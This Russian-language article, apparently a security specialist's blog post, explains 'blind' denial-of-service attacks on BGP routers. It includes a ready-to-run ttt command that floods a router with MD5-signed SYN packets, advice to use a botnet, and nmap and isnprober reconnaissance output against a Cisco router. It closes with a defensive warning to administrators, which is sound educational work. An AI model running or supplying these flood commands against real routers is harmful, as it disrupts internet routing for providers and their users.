«Слепые» DoS-атаки на BGP-маршрутизаторы.
Слепыми мы будем называть те атаки, которые не требуют каких-либо дополнительных знаний, кроме IP-адреса BGP-маршрутизатора. Простейшим сценарием такой DoS-атаки является SYN flood на порт TCP 179. Для реализации подобной атаки на промышленный маршрутизатор необходимо использовать несколько десятков компьютеров, а лучше бот-сеть.
Более интересным способом «затопления» целевого роутера BGP, использующего MD5-аутентификацию, является применение SYN TCP-пакетов с MD5-сигнатурами. Эта атака позволяет добавить вычислительную нагрузку на обработку MD5 атакуемым роутером.
Такую атаку несложно осуществить с помощью утилиты ttt с опцией md5. Для оптимизации затопления несколько экземпляров ttt должны быть запущены на нескольких десятках машин.
Вот пример использования утилиты ttt:
arhontus# ./ttt --flood 10000000 -y 11006 --syn --md5
allyourbgparebelongtous -D 192.168.66.191 && ./ttt --flood 10000000 -y
179 --syn --md5 allyourbgparebelongtous -D 192.168.66.191
Говоря об оборудовании производства Cisco Systems, следует упомянуть о возможности реализации атак на переполнение TCP/IP-стека IOS. Для того чтобы выявить такие уязвимости, можно воспользоваться сканерами уязвимостей, например Nmap, hping2 и isnprober.
Вот пример для маршрутизатора Cisco 2600:
kali# nmap -sS -O -vvvv 192.168.66.215
<skip>
TCP Sequence Prediction: class="truly" random
Difficulty=9999999 (Good luck!)
TCP ISN Seq. Numbers: 5142798B A95D7AC9 71F42B5A 4D684349 FF2B94D4 B764FD5C
<skip> arhontus# # perl isnprober.pl -n 10 -i eth0 -p 23 192.168.66.215
-- ISNprober / 1.02 / Tom Vandepoel (Tom.Vandepoel@ubizen.com) --
Using eth0:192.168.77.5
Probing host: 192.168.66.215 on TCP port 23.
Host:port ISN Delta
192.168.66.202:23 -1154503313
192.168.66.202:23 -24125463 1130377850
192.168.66.202:23 2031059534 2055184997
192.168.66.202:23 965205234 -1065854300
192.168.66.202:23 -1974685094 -2939890328
192.168.66.202:23 1760147902 3734832996
192.168.66.202:23 2089287258 329139356
192.168.66.202:23 -923724721 -3013011979
192.168.66.202:23 -934490140 -10765419
192.168.66.202:23 -1262713275 -328223135
В целом протокол маршрутизации BGP версии 4 является неотъемлемой частью современного интернета, и, соответственно, проблемы в работе данного протокола непременно скажутся на функционировании глобальной сети. Поэтому если в обязанности системного администратора входит обслуживание маршрутизаторов, работающих с BGP (как правило, это компании-провайдеры), то необходимо со всей серьезностью отнестись к возможным угрозам и заблаговременно принять меры по защите от них.
Петухов Олег, юрист в области международного права и защиты персональных данных, специалист в области информационной безопасности, защиты информации и персональных данных.
Телеграм-канал: https://t.me/zashchitainformacii
Группа в Телеграм: https://t.me/zashchitainformacii1
Сайт: https://legascom.ru
Электронная почта: online@legascom.ru
#защитаинформации #информационнаябезопасность




